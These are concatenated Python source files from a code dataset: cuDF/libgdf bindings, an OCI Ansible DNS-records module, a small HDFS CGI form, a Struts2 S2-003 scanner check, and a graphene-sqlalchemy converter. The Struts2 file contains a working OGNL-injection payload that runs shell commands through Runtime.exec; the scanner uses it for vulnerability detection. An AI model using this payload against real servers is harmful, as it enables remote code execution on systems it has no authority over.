libgdf.gdf_context_view(gdf_context, 1, method_api, 0, 0, 0)
else:
msg = "method not supported"
raise ValueError(msg)
col_result_l = columnview(0, None, dtype=np.int32)
col_result_r = columnview(0, None, dtype=np.int32)
if(how in ['left', 'inner']):
list_lhs = []
list_rhs = []
for i in range(len(col_lhs)):
list_lhs.append(col_lhs[i].cffi_view)
list_rhs.append(col_rhs[i].cffi_view)
# Call libgdf
joiner(len(col_lhs), list_lhs, list_rhs, col_result_l,
col_result_r, gdf_context)
else:
joiner(col_lhs[0].cffi_view, col_rhs[0].cffi_view, col_result_l,
col_result_r)
# Extract result
left = rmm.device_array_from_ptr(ptr=col_result_l.data,
nelem=col_result_l.size,
dtype=np.int32)
right = rmm.device_array_from_ptr(ptr=col_result_r.data,
nelem=col_result_r.size,
dtype=np.int32)
yield(left, right)
libgdf.gdf_column_free(col_result_l)
libgdf.gdf_column_free(col_result_r)
def libgdf_join(col_lhs, col_rhs, on, how, method='sort'):
joiner = _join_how_api[how]
method_api = _join_method_api[method]
gdf_context = ffi.new('gdf_context*')
libgdf.gdf_context_view(gdf_context, 0, method_api, 0, 0, 0)
if how not in ['left', 'inner', 'outer']:
msg = "new join api only supports left or inner"
raise ValueError(msg)
list_lhs = []
list_rhs = []
result_cols = []
result_col_names = []
left_idx = []
right_idx = []
# idx = 0
for name, col in col_lhs.items():
list_lhs.append(col._column.cffi_view)
if name not in on:
result_cols.append(columnview(0, None, dtype=col._column.dtype))
result_col_names.append(name)
for name in on:
result_cols.append(columnview(0, None,
dtype=col_lhs[name]._column.dtype))
result_col_names.append(name)
left_idx.append(list(col_lhs.keys()).index(name))
right_idx.append(list(col_rhs.keys()).index(name))
for name, col in col_rhs.items():
list_rhs.append(col._column.cffi_view)
if name not in on:
result_cols.append(columnview(0, None, dtype=col._column.dtype))
result_col_names.append(name)
num_cols_to_join = len(on)
result_num_cols = len(list_lhs) + len(list_rhs) - num_cols_to_join
joiner(list_lhs,
len(list_lhs),
left_idx,
list_rhs,
len(list_rhs),
right_idx,
num_cols_to_join,
result_num_cols,
result_cols,
ffi.NULL,
ffi.NULL,
gdf_context)
res = []
valids = []
for col in result_cols:
intaddr = int(ffi.cast("uintptr_t", col.data))
res.append(rmm.device_array_from_ptr(ptr=intaddr,
nelem=col.size,
dtype=gdf_to_np_dtype(col.dtype),
finalizer=rmm._make_finalizer(
intaddr, 0)))
intaddr = int(ffi.cast("uintptr_t", col.valid))
valids.append(rmm.device_array_from_ptr(ptr=intaddr,
nelem=calc_chunk_size(
col.size, mask_bitsize),
dtype=mask_dtype,
finalizer=rmm._make_finalizer(
intaddr, 0)))
return res, valids
def apply_prefixsum(col_inp, col_out, inclusive):
libgdf.gdf_prefixsum_generic(col_inp, col_out, inclusive)
def apply_segsort(col_keys, col_vals, segments, descending=False,
plan=None):
"""Inplace segemented sort
Parameters
----------
col_keys : Column
col_vals : Column
segments : device array
"""
# prepare
nelem = len(col_keys)
if nelem == segments.size:
# As many seguments as there are elements.
# Nothing to do.
return
if plan is None:
plan = SegmentedRadixortPlan(nelem, col_keys.dtype, col_vals.dtype,
descending=descending)
plan.sort(segments, col_keys, col_vals)
return plan
class SegmentedRadixortPlan(object):
def __init__(self, nelem, key_dtype, val_dtype, descending=False):
begin_bit = 0
self.sizeof_key = key_dtype.itemsize
self.sizeof_val = val_dtype.itemsize
end_bit = self.sizeof_key * 8
plan = libgdf.gdf_segmented_radixsort_plan(nelem, descending,
begin_bit, end_bit)
self.plan = plan
self.nelem = nelem
self.is_closed = False
self.setup()
def __del__(self):
if not self.is_closed:
self.close()
def close(self):
libgdf.gdf_segmented_radixsort_plan_free(self.plan)
self.is_closed = True
self.plan = None
def setup(self):
libgdf.gdf_segmented_radixsort_plan_setup(self.plan, self.sizeof_key,
self.sizeof_val)
def sort(self, segments, col_keys, col_vals):
seg_dtype = np.uint32
segsize_limit = 2 ** 16 - 1
d_fullsegs = rmm.device_array(segments.size + 1, dtype=seg_dtype)
d_begins = d_fullsegs[:-1]
d_ends = d_fullsegs[1:]
# Note: .astype is required below because .copy_to_device
# is just a plain memcpy
d_begins.copy_to_device(cudautils.astype(segments, dtype=seg_dtype))
d_ends[-1:].copy_to_device(np.require([self.nelem], dtype=seg_dtype))
# The following is to handle the segument size limit due to
# max CUDA grid size.
range0 = range(0, segments.size, segsize_limit)
range1 = itertools.chain(range0[1:], [segments.size])
for s, e in zip(range0, range1):
segsize = e - s
libgdf.gdf_segmented_radixsort_generic(self.plan,
col_keys.cffi_view,
col_vals.cffi_view,
segsize,
unwrap_devary(d_begins[s:]),
unwrap_devary(d_ends[s:]))
def hash_columns(columns, result):
"""Hash the *columns* and store in *result*.
Returns *result*
"""
assert len(columns) > 0
assert result.dtype == np.int32
# No-op for 0-sized
if len(result) == 0:
return result
col_input = [col.cffi_view for col in columns]
col_out = result.cffi_view
ncols = len(col_input)
hashfn = libgdf.GDF_HASH_MURMUR3
libgdf.gdf_hash(ncols, col_input, hashfn, col_out)
return result
def hash_partition(input_columns, key_indices, nparts, output_columns):
"""Partition the input_columns by the hash values on the keys.
Parameters
----------
input_columns : sequence of Column
key_indices : sequence of int
Indices into `input_columns` that indicates the key columns.
nparts : int
number of partitions
Returns
-------
partition_offsets : list of int
Each index indicates the start of a partition.
"""
assert len(input_columns) == len(output_columns)
col_inputs = [col.cffi_view for col in input_columns]
col_outputs = [col.cffi_view for col in output_columns]
offsets = ffi.new('int[]', nparts)
hashfn = libgdf.GDF_HASH_MURMUR3
libgdf.gdf_hash_partition(
len(col_inputs),
col_inputs,
key_indices,
len(key_indices),
nparts,
col_outputs,
offsets,
hashfn
)
offsets = list(offsets)
return offsets
def count_nonzero_mask(mask, size):
assert mask.size * mask_bitsize >= size
nnz = ffi.new('int*')
nnz[0] = 0
mask_ptr, addr = unwrap_mask(mask)
if addr != ffi.NULL:
libgdf.gdf_count_nonzero_mask(mask_ptr, size, nnz)
return nnz[0]
_GDF_COLORS = {
'green': libgdf.GDF_GREEN,
'blue': libgdf.GDF_BLUE,
'yellow': libgdf.GDF_YELLOW,
'purple': libgdf.GDF_PURPLE,
'cyan': libgdf.GDF_CYAN,
'red': libgdf.GDF_RED,
'white': libgdf.GDF_WHITE,
'darkgreen': libgdf.GDF_DARK_GREEN,
'orange': libgdf.GDF_ORANGE,
}
def str_to_gdf_color(s):
"""Util to convert str to gdf_color type.
"""
return _GDF_COLORS[s.lower()]
def nvtx_range_push(name, color='green'):
"""
Demarcate the beginning of a user-defined NVTX range.
Parameters
----------
name : str
The name of the NVTX range
color : str
The color to use for the range.
Can be named color or hex RGB string.
"""
name_c = ffi.new("char[]", name.encode('ascii'))
try:
color = int(color, 16) # only works if color is a hex string
libgdf.gdf_nvtx_range_push_hex(name_c, ffi.cast('unsigned int', color))
except ValueError:
color = str_to_gdf_color(color)
libgdf.gdf_nvtx_range_push(name_c, color)
def nvtx_range_pop():
""" Demarcate the end of the inner-most range.
"""
libgdf.gdf_nvtx_range_pop()
def rmm_initialize():
rmm.initialize()
return True
def rmm_finalize():
rmm.finalize()
return True
_GDF_QUANTILE_METHODS = {
'linear': libgdf.GDF_QUANT_LINEAR,
'lower': libgdf.GDF_QUANT_LOWER,
'higher': libgdf.GDF_QUANT_HIGHER,
'midpoint': libgdf.GDF_QUANT_MIDPOINT,
'nearest': libgdf.GDF_QUANT_NEAREST,
}
def get_quantile_method(method):
"""Util to convert method to gdf gdf_quantile_method.
"""
return _GDF_QUANTILE_METHODS[method]
def quantile(column, quant, method, exact):
""" Calculate the `quant` quantile for the column
Returns value with the quantile specified by quant
"""
gdf_context = ffi.new('gdf_context*')
method_api = _join_method_api['sort']
libgdf.gdf_context_view(gdf_context, 0, method_api, 0, 0, 0)
# libgdf.gdf_context_view(gdf_context, 0, method_api, 0)
# px = ffi.new("double *")
res = []
for q in quant:
px = ffi.new("double *")
if exact:
libgdf.gdf_quantile_exact(column.cffi_view,
get_quantile_method(method),
q,
ffi.cast('void *', px),
gdf_context)
else:
libgdf.gdf_quantile_aprrox(column.cffi_view,
q,
ffi.cast('void *', px),
gdf_context)
res.append(px[0])
return res
| 29.960591 | 79 | 0.580675 |
5a9a13923c92a553c0ce88bfd2968fc0adeff35a | 20,357 | py | Python | plugins/modules/oci_dns_domain_records.py | sagar2938/oci-ansible-collection | 5b8ce583a0d5d0aabf14494d61aea4649e18d1e6 | [
"Apache-2.0"
] | null | null | null | plugins/modules/oci_dns_domain_records.py | sagar2938/oci-ansible-collection | 5b8ce583a0d5d0aabf14494d61aea4649e18d1e6 | [
"Apache-2.0"
] | null | null | null | plugins/modules/oci_dns_domain_records.py | sagar2938/oci-ansible-collection | 5b8ce583a0d5d0aabf14494d61aea4649e18d1e6 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Copyright (c) 2020, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_dns_domain_records
short_description: Manage a DomainRecords resource in Oracle Cloud Infrastructure
description:
- This module allows the user to update, patch and delete a DomainRecords resource in Oracle Cloud Infrastructure
- This module does not support check mode
version_added: "2.9.0"
author: Oracle (@oracle)
options:
zone_name_or_id:
description:
- The name or OCID of the target zone.
type: str
aliases: ["zone_id", "name", "zone_name", "id"]
required: true
domain:
description:
- The target fully-qualified domain name (FQDN) within the target zone.
type: str
required: true
update_items:
description:
- ""
- This parameter is updatable.
type: list
elements: dict
suboptions:
domain:
description:
- The fully qualified domain name where the record can be located.
- This parameter is updatable.
type: str
required: true
record_hash:
description:
- A unique identifier for the record within its zone.
- This parameter is updatable.
type: str
is_protected:
description:
- A Boolean flag indicating whether or not parts of the record
are unable to be explicitly managed.
- This parameter is updatable.
type: bool
rdata:
description:
- The record's data, as whitespace-delimited tokens in
type-specific presentation format. All RDATA is normalized and the
returned presentation of your RDATA may differ from its initial input.
For more information about RDATA, see L(Supported DNS Resource Record
Types,https://docs.cloud.oracle.com/iaas/Content/DNS/Reference/supporteddnsresource.htm)
- This parameter is updatable.
type: str
required: true
rrset_version:
description:
- The latest version of the record's zone in which its RRSet differs
from the preceding version.
- This parameter is updatable.
type: str
rtype:
description:
- The type of DNS record, such as A or CNAME. For more information, see L(Resource Record (RR) TYPEs,https://www.iana.org/assignments/dns-
parameters/dns-parameters.xhtml#dns-parameters-4).
- This parameter is updatable.
type: str
required: true
ttl:
description:
- The Time To Live for the record, in seconds.
- This parameter is updatable.
type: int
required: true
if_unmodified_since:
description:
- The `If-Unmodified-Since` header field makes the request method
conditional on the selected representation's last modification date being
earlier than or equal to the date provided in the field-value. This
field accomplishes the same purpose as If-Match for cases where the user
agent does not have an entity-tag for the representation.
- This parameter is updatable.
type: str
scope:
description:
- Specifies to operate only on resources that have a matching DNS scope.
- This parameter is updatable.
type: str
choices:
- "GLOBAL"
- "PRIVATE"
view_id:
description:
- The OCID of the view the resource is associated with.
- This parameter is updatable.
type: str
compartment_id:
description:
- The OCID of the compartment the resource belongs to.
- This parameter is updatable.
type: str
patch_items:
description:
- ""
type: list
elements: dict
suboptions:
domain:
description:
- The fully qualified domain name where the record can be located.
type: str
record_hash:
description:
- A unique identifier for the record within its zone.
type: str
is_protected:
description:
- A Boolean flag indicating whether or not parts of the record
are unable to be explicitly managed.
type: bool
rdata:
description:
- The record's data, as whitespace-delimited tokens in
type-specific presentation format. All RDATA is normalized and the
returned presentation of your RDATA may differ from its initial input.
For more information about RDATA, see L(Supported DNS Resource Record
Types,https://docs.cloud.oracle.com/iaas/Content/DNS/Reference/supporteddnsresource.htm)
type: str
rrset_version:
description:
- The latest version of the record's zone in which its RRSet differs
from the preceding version.
type: str
rtype:
description:
- The type of DNS record, such as A or CNAME. For more information, see L(Resource Record (RR) TYPEs,https://www.iana.org/assignments/dns-
parameters/dns-parameters.xhtml#dns-parameters-4).
type: str
ttl:
description:
- The Time To Live for the record, in seconds.
type: int
operation:
description:
- A description of how a record relates to a PATCH operation.
- "- `REQUIRE` indicates a precondition that record data **must** already exist.
- `PROHIBIT` indicates a precondition that record data **must not** already exist.
- `ADD` indicates that record data **must** exist after successful application.
- `REMOVE` indicates that record data **must not** exist after successful application."
- " **Note:** `ADD` and `REMOVE` operations can succeed even if
they require no changes when applied, such as when the described
records are already present or absent."
- " **Note:** `ADD` and `REMOVE` operations can describe changes for
more than one record."
- " **Example:** `{ \\"domain\\": \\"www.example.com\\", \\"rtype\\": \\"AAAA\\", \\"ttl\\": 60 }`
specifies a new TTL for every record in the www.example.com AAAA RRSet."
type: str
choices:
- "REQUIRE"
- "PROHIBIT"
- "ADD"
- "REMOVE"
state:
description:
- The state of the DomainRecords.
- Use I(state=present) to update an existing a DomainRecords.
- Use I(state=absent) to delete a DomainRecords.
type: str
required: false
default: 'present'
choices: ["present", "absent"]
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: Update domain_records
oci_dns_domain_records:
# required
zone_name_or_id: "ocid1.zonenameor.oc1..xxxxxxEXAMPLExxxxxx"
domain: domain_example
# optional
update_items:
- # required
domain: www.example.com
rdata: v=spf1 include:example.net -all
rtype: TXT
ttl: 30
# optional
record_hash: 8f356bd7e9c2007c5c898f441fb663e9
is_protected: false
rrset_version: 9
if_unmodified_since: if_unmodified_since_example
scope: GLOBAL
view_id: "ocid1.view.oc1..xxxxxxEXAMPLExxxxxx"
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
- name: Delete domain_records
oci_dns_domain_records:
# required
zone_name_or_id: "ocid1.zonenameor.oc1..xxxxxxEXAMPLExxxxxx"
domain: domain_example
state: absent
# optional
if_unmodified_since: if_unmodified_since_example
scope: GLOBAL
view_id: "ocid1.view.oc1..xxxxxxEXAMPLExxxxxx"
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
"""
RETURN = """
domain_records:
description:
- Details of the DomainRecords resource acted upon by the current operation
returned: on success
type: complex
contains:
domain:
description:
- The fully qualified domain name where the record can be located.
returned: on success
type: str
sample: domain_example
record_hash:
description:
- A unique identifier for the record within its zone.
returned: on success
type: str
sample: record_hash_example
is_protected:
description:
- A Boolean flag indicating whether or not parts of the record
are unable to be explicitly managed.
returned: on success
type: bool
sample: true
rdata:
description:
- The record's data, as whitespace-delimited tokens in
type-specific presentation format. All RDATA is normalized and the
returned presentation of your RDATA may differ from its initial input.
For more information about RDATA, see L(Supported DNS Resource Record
Types,https://docs.cloud.oracle.com/iaas/Content/DNS/Reference/supporteddnsresource.htm)
returned: on success
type: str
sample: rdata_example
rrset_version:
description:
- The latest version of the record's zone in which its RRSet differs
from the preceding version.
returned: on success
type: str
sample: rrset_version_example
rtype:
description:
- The type of DNS record, such as A or CNAME. For more information, see L(Resource Record (RR) TYPEs,https://www.iana.org/assignments/dns-
parameters/dns-parameters.xhtml#dns-parameters-4).
returned: on success
type: str
sample: rtype_example
ttl:
description:
- The Time To Live for the record, in seconds.
returned: on success
type: int
sample: 56
sample: {
"domain": "domain_example",
"record_hash": "record_hash_example",
"is_protected": true,
"rdata": "rdata_example",
"rrset_version": "rrset_version_example",
"rtype": "rtype_example",
"ttl": 56
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import (
oci_common_utils,
oci_wait_utils,
)
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceHelperBase,
get_custom_class,
)
try:
from oci.dns import DnsClient
from oci.dns.models import UpdateDomainRecordsDetails
from oci.dns.models import PatchDomainRecordsDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class DomainRecordsHelperGen(OCIResourceHelperBase):
"""Supported operations: update, patch, get and delete"""
def get_module_resource_id_param(self):
return "domain"
def get_module_resource_id(self):
return self.module.params.get("domain")
def get_get_fn(self):
return self.client.get_domain_records
def get_resource(self):
optional_params = [
"scope",
"view_id",
"compartment_id",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_params
if self.module.params.get(param) is not None
)
return oci_common_utils.get_default_response_from_resource(
oci_common_utils.list_all_resources(
self.client.get_domain_records,
zone_name_or_id=self.module.params.get("zone_name_or_id"),
domain=self.module.params.get("domain"),
**optional_kwargs
).items
)
def get_update_model_class(self):
return UpdateDomainRecordsDetails
def update_resource(self):
update_details = self.get_update_model()
optional_enum_params = [
"scope",
]
optional_enum_kwargs = dict(
(param, self.module.params[param])
for param in optional_enum_params
if self.module.params.get(param) is not None
)
return oci_wait_utils.call_and_wait(
call_fn=self.client.update_domain_records,
call_fn_args=(),
call_fn_kwargs=dict(
zone_name_or_id=self.module.params.get("zone_name_or_id"),
domain=self.module.params.get("domain"),
update_domain_records_details=update_details,
if_unmodified_since=self.module.params.get("if_unmodified_since"),
view_id=self.module.params.get("view_id"),
compartment_id=self.module.params.get("compartment_id"),
**optional_enum_kwargs
),
waiter_type=oci_wait_utils.NONE_WAITER_KEY,
operation=oci_common_utils.UPDATE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.UPDATE_OPERATION_KEY,
),
)
def get_patch_model_class(self):
return PatchDomainRecordsDetails
def patch_resource(self):
patch_details = self.get_patch_model()
optional_enum_params = [
"scope",
]
optional_enum_kwargs = dict(
(param, self.module.params[param])
for param in optional_enum_params
if self.module.params.get(param) is not None
)
return oci_wait_utils.call_and_wait(
call_fn=self.client.patch_domain_records,
call_fn_args=(),
call_fn_kwargs=dict(
zone_name_or_id=self.module.params.get("zone_name_or_id"),
domain=self.module.params.get("domain"),
patch_domain_records_details=patch_details,
if_unmodified_since=self.module.params.get("if_unmodified_since"),
view_id=self.module.params.get("view_id"),
compartment_id=self.module.params.get("compartment_id"),
**optional_enum_kwargs
),
waiter_type=oci_wait_utils.NONE_WAITER_KEY,
operation=oci_common_utils.PATCH_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.PATCH_OPERATION_KEY,
),
)
def delete_resource(self):
optional_enum_params = [
"scope",
]
optional_enum_kwargs = dict(
(param, self.module.params[param])
for param in optional_enum_params
if self.module.params.get(param) is not None
)
return oci_wait_utils.call_and_wait(
call_fn=self.client.delete_domain_records,
call_fn_args=(),
call_fn_kwargs=dict(
zone_name_or_id=self.module.params.get("zone_name_or_id"),
domain=self.module.params.get("domain"),
if_unmodified_since=self.module.params.get("if_unmodified_since"),
view_id=self.module.params.get("view_id"),
compartment_id=self.module.params.get("compartment_id"),
**optional_enum_kwargs
),
waiter_type=oci_wait_utils.NONE_WAITER_KEY,
operation=oci_common_utils.DELETE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.DELETE_OPERATION_KEY,
),
)
def is_resource_dead(self, resource):
# response model returns a collection. Consider existence of a value as active.
if not resource:
return True
return False
DomainRecordsHelperCustom = get_custom_class("DomainRecordsHelperCustom")
class ResourceHelper(DomainRecordsHelperCustom, DomainRecordsHelperGen):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec(
supports_create=False, supports_wait=False
)
module_args.update(
dict(
zone_name_or_id=dict(
aliases=["zone_id", "name", "zone_name", "id"],
type="str",
required=True,
),
domain=dict(type="str", required=True),
update_items=dict(
type="list",
elements="dict",
options=dict(
domain=dict(type="str", required=True),
record_hash=dict(type="str"),
is_protected=dict(type="bool"),
rdata=dict(type="str", required=True),
rrset_version=dict(type="str"),
rtype=dict(type="str", required=True),
ttl=dict(type="int", required=True),
),
),
if_unmodified_since=dict(type="str"),
scope=dict(type="str", choices=["GLOBAL", "PRIVATE"]),
view_id=dict(type="str"),
compartment_id=dict(type="str"),
patch_items=dict(
type="list",
elements="dict",
options=dict(
domain=dict(type="str"),
record_hash=dict(type="str"),
is_protected=dict(type="bool"),
rdata=dict(type="str"),
rrset_version=dict(type="str"),
rtype=dict(type="str"),
ttl=dict(type="int"),
operation=dict(
type="str", choices=["REQUIRE", "PROHIBIT", "ADD", "REMOVE"]
),
),
),
state=dict(type="str", default="present", choices=["present", "absent"]),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_helper = ResourceHelper(
module=module,
resource_type="domain_records",
service_client_class=DnsClient,
namespace="dns",
)
result = dict(changed=False)
if resource_helper.is_delete():
result = resource_helper.delete()
elif resource_helper.is_update():
result = resource_helper.update()
elif resource_helper.is_patch():
result = resource_helper.patch()
module.exit_json(**result)
if __name__ == "__main__":
main()
| 37.83829 | 158 | 0.580095 |
ed794617fcd38ce6fef6ebcfac8f26bc4d1c678f | 314 | py | Python | HDFS-MapRed setup ansible/hdfs.py | ayu-gupta/HDFS-MapRed-Ansible | 1a2c690c686de59856d1ea32b7e0d9efcadbd02b | [
"Apache-2.0"
] | null | null | null | HDFS-MapRed setup ansible/hdfs.py | ayu-gupta/HDFS-MapRed-Ansible | 1a2c690c686de59856d1ea32b7e0d9efcadbd02b | [
"Apache-2.0"
] | null | null | null | HDFS-MapRed setup ansible/hdfs.py | ayu-gupta/HDFS-MapRed-Ansible | 1a2c690c686de59856d1ea32b7e0d9efcadbd02b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python2
print("content-type: text/html")
print("")
print("Welcome to HDFS Cluster")
print("<br/>")
print("""
<form action='hdfs_setup.py'>
Enter no of DataNode: <input type='text' name='dn' />
<br/>
Enter no of TaskTrackers: <input type='text' name='tt' />
<input type='submit' />
</form>
""")
| 14.952381 | 58 | 0.630573 |
9fa1f84d41443715e48e1d6b3a4997fdab780253 | 2,259 | py | Python | python/app/plugins/http/Struts2/S2_003.py | taomujian/linbing | fe772a58f41e3b046b51a866bdb7e4655abaf51a | [
"MIT"
] | 351 | 2020-02-26T05:23:26.000Z | 2022-03-26T12:39:19.000Z | python/app/plugins/http/Struts2/S2_003.py | taomujian/linbing | fe772a58f41e3b046b51a866bdb7e4655abaf51a | [
"MIT"
] | 15 | 2020-03-26T07:31:49.000Z | 2022-03-09T02:12:17.000Z | python/app/plugins/http/Struts2/S2_003.py | taomujian/linbing | fe772a58f41e3b046b51a866bdb7e4655abaf51a | [
"MIT"
] | 99 | 2020-02-28T07:30:46.000Z | 2022-03-16T16:41:09.000Z | #!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.common import get_capta, get_useragent
class S2_003_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'Struts2 S2-003漏洞,又名CVE-2008-6504漏洞.',
'description': 'Struts 2.0.0 - Struts 2.1.8.1',
'date': '2008-10-15',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
if '.action' not in self.url:
self.url = self.url + '/example/HelloWorld.action'
self.headers = {
'User-Agent': get_useragent()
}
self.capta = get_capta()
self.payload = r'''?('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(kxlzx)(kxlzx)&('\u0023mycmd\u003d\'{0}\'')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)')(bla)(bla)&(A)(('\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())')(bla))&(B)(('\u0023myres\u003dnew\40byte[51020]')(bla))&(C)(('\u0023mydat.readFully(\u0023myres)')(bla))&(D)(('\u0023mystr\u003dnew\40java.lang.String(\u0023myres)')(bla))&('\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()')(bla)(bla)&(E)(('\u0023myout.getWriter().println(\u0023mystr)')(bla))'''
def check(self):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try:
self.check_payload = self.payload.format('echo\\n' + self.capta)
check_req = request.get(self.url + self.check_payload, headers = self.headers)
if self.capta in check_req.text.replace('\n', '') and len(check_req.text) < 100:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
S2_003 = S2_003_BaseVerify('http://localhost:8080/s2_003_war_exploded/HelloWorld.action')
print(S2_003.check()) | 44.294118 | 743 | 0.602479 |
7cc259e00245b52bac2b9cede3be9c5235e72960 | 6,605 | py | Python | graphene_sqlalchemy/converter.py | dubbl/graphene-sqlalchemy | e362e3fc4993d7e95873044bb4d00185b1d3dd8b | [
"MIT"
] | null | null | null | graphene_sqlalchemy/converter.py | dubbl/graphene-sqlalchemy | e362e3fc4993d7e95873044bb4d00185b1d3dd8b | [
"MIT"
] | null | null | null | graphene_sqlalchemy/converter.py | dubbl/graphene-sqlalchemy | e362e3fc4993d7e95873044bb4d00185b1d3dd8b | [
"MIT"
] | null | null | null | from singledispatch import singledispatch
from sqlalchemy import types
from sqlalchemy.dialects import postgresql
from sqlalchemy.orm import interfaces
from graphene import (ID, Boolean, Dynamic, Enum, Field, Float, Int, List,
String)
from graphene.types.json import JSONString
try:
from sqlalchemy_utils import ChoiceType, JSONType, ScalarListType, TSVectorType
except ImportError:
ChoiceType = JSONType = ScalarListType = TSVectorType = object
def get_column_doc(column):
return getattr(column, "doc", None)
def is_column_nullable(column):
return bool(getattr(column, "nullable", True))
def convert_sqlalchemy_relationship(relationship, registry, connection_field_factory):
direction = relationship.direction
model = relationship.mapper.entity
def dynamic_type():
_type = registry.get_type_for_model(model)
if not _type:
return None
if direction == interfaces.MANYTOONE or not relationship.uselist:
return Field(_type)
elif direction in (interfaces.ONETOMANY, interfaces.MANYTOMANY):
if _type._meta.connection:
return connection_field_factory(relationship, registry)
return Field(List(_type))
return Dynamic(dynamic_type)
def convert_sqlalchemy_hybrid_method(hybrid_item):
return String(description=getattr(hybrid_item, "__doc__", None), required=False)
def convert_sqlalchemy_composite(composite, registry):
converter = registry.get_converter_for_composite(composite.composite_class)
if not converter:
try:
raise Exception(
"Don't know how to convert the composite field %s (%s)"
% (composite, composite.composite_class)
)
except AttributeError:
# handle fields that are not attached to a class yet (don't have a parent)
raise Exception(
"Don't know how to convert the composite field %r (%s)"
% (composite, composite.composite_class)
)
return converter(composite, registry)
def _register_composite_class(cls, registry=None):
if registry is None:
from .registry import get_global_registry
registry = get_global_registry()
def inner(fn):
registry.register_composite_converter(cls, fn)
return inner
convert_sqlalchemy_composite.register = _register_composite_class
def convert_sqlalchemy_column(column, registry=None):
return convert_sqlalchemy_type(getattr(column, "type", None), column, registry)
@singledispatch
def convert_sqlalchemy_type(type, column, registry=None):
raise Exception(
"Don't know how to convert the SQLAlchemy field %s (%s)"
% (column, column.__class__)
)
@convert_sqlalchemy_type.register(types.Date)
@convert_sqlalchemy_type.register(types.Time)
@convert_sqlalchemy_type.register(types.String)
@convert_sqlalchemy_type.register(types.Text)
@convert_sqlalchemy_type.register(types.Unicode)
@convert_sqlalchemy_type.register(types.UnicodeText)
@convert_sqlalchemy_type.register(postgresql.UUID)
@convert_sqlalchemy_type.register(postgresql.INET)
@convert_sqlalchemy_type.register(postgresql.CIDR)
@convert_sqlalchemy_type.register(TSVectorType)
def convert_column_to_string(type, column, registry=None):
return String(
description=get_column_doc(column), required=not (is_column_nullable(column))
)
@convert_sqlalchemy_type.register(types.DateTime)
def convert_column_to_datetime(type, column, registry=None):
from graphene.types.datetime import DateTime
return DateTime(
description=get_column_doc(column), required=not (is_column_nullable(column))
)
@convert_sqlalchemy_type.register(types.SmallInteger)
@convert_sqlalchemy_type.register(types.Integer)
def convert_column_to_int_or_id(type, column, registry=None):
if column.primary_key:
return ID(
description=get_column_doc(column),
required=not (is_column_nullable(column)),
)
else:
return Int(
description=get_column_doc(column),
required=not (is_column_nullable(column)),
)
@convert_sqlalchemy_type.register(types.Boolean)
def convert_column_to_boolean(type, column, registry=None):
return Boolean(
description=get_column_doc(column), required=not (is_column_nullable(column))
)
@convert_sqlalchemy_type.register(types.Float)
@convert_sqlalchemy_type.register(types.Numeric)
@convert_sqlalchemy_type.register(types.BigInteger)
def convert_column_to_float(type, column, registry=None):
return Float(
description=get_column_doc(column), required=not (is_column_nullable(column))
)
@convert_sqlalchemy_type.register(types.Enum)
def convert_enum_to_enum(type, column, registry=None):
enum_class = getattr(type, 'enum_class', None)
if enum_class: # Check if an enum.Enum type is used
graphene_type = Enum.from_enum(enum_class)
else: # Nope, just a list of string options
items = zip(type.enums, type.enums)
graphene_type = Enum(type.name, items)
return Field(
graphene_type,
description=get_column_doc(column),
required=not (is_column_nullable(column)),
)
@convert_sqlalchemy_type.register(ChoiceType)
def convert_column_to_enum(type, column, registry=None):
name = "{}_{}".format(column.table.name, column.name).upper()
return Enum(name, type.choices, description=get_column_doc(column))
@convert_sqlalchemy_type.register(ScalarListType)
def convert_scalar_list_to_list(type, column, registry=None):
return List(String, description=get_column_doc(column))
@convert_sqlalchemy_type.register(postgresql.ARRAY)
def convert_postgres_array_to_list(_type, column, registry=None):
graphene_type = convert_sqlalchemy_type(column.type.item_type, column)
inner_type = type(graphene_type)
return List(
inner_type,
description=get_column_doc(column),
required=not (is_column_nullable(column)),
)
@convert_sqlalchemy_type.register(postgresql.HSTORE)
@convert_sqlalchemy_type.register(postgresql.JSON)
@convert_sqlalchemy_type.register(postgresql.JSONB)
def convert_json_to_string(type, column, registry=None):
return JSONString(
